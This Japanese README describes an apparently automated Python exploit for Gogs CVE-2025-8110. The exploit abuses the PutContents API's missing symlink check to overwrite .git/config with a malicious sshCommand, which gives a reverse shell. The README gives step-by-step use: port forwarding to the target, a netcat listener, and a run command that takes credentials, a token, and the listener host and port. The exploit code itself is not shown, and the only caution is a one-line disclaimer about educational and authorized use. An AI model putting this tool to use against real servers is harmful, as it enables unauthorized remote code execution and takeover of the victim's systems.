
Gogs CVE-2025-8110 RCEエクスプロイト
GogsのCVE-2025-8110に対する自動化されたPythonエクスプロイトです。この脆弱性は、PutContents APIがファイルパスがシンボリックリンクかどうかを検証しないことを悪用して、リモートコード実行(RCE)を可能にします。シンボリックリンクを介して内部の.git/configファイルを上書きすることで、悪意のあるsshCommandを注入し、リバースシェルをトリガーします。
Python 3と必要な依存関係がインストールされていることを確認してください:
pip install requests rich beautifulsoup4
また、リポジトリのクローンとコミットの段階のために、gitがインストールされ、$PATHに含まれている必要があります。
Gogsは127.0.0.1:3001にバインドされている場合があります。ポートフォワーディングを使用してローカルでWebUIにアクセスします:
ssh -L 3001:127.0.0.1:3001 user@target-ip
フォワーディング後、http://localhost:3001に移動します:
スクリプトはGogs APIを使用してペイロードを配信します:
APIの更新が処理されるとすぐにシェルがトリガーされるため、スクリプトを実行する前にリスナーを起動します。
nc -lvnp 5555
認証情報とトークンを引数として渡します:
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555
| フラグ | 説明 |
|---|---|
-u | GogsインスタンスのベースURL(例:http://localhost:3001)。 |
-un | 作成したアカウントのユーザー名。 |
-pw | 作成したアカウントのパスワード。 |
-t | 設定で生成したAPIトークン。 |
-lh | リスナーのIPアドレス(LHOST)。 |
-lp | リスナーのポート番号(LPORT)。 |
注: スクリプトがハングしたり、"Overwriting .git/config"の後に
Read timed outが返された場合は、リスナーを確認してください。これは通常、リバースシェルが正常に接続され、その接続を保持していることを示しています。
作成者: TYehan
免責事項: このツールは教育目的および許可されたセキュリティ監査専用です。責任を持って使用してください。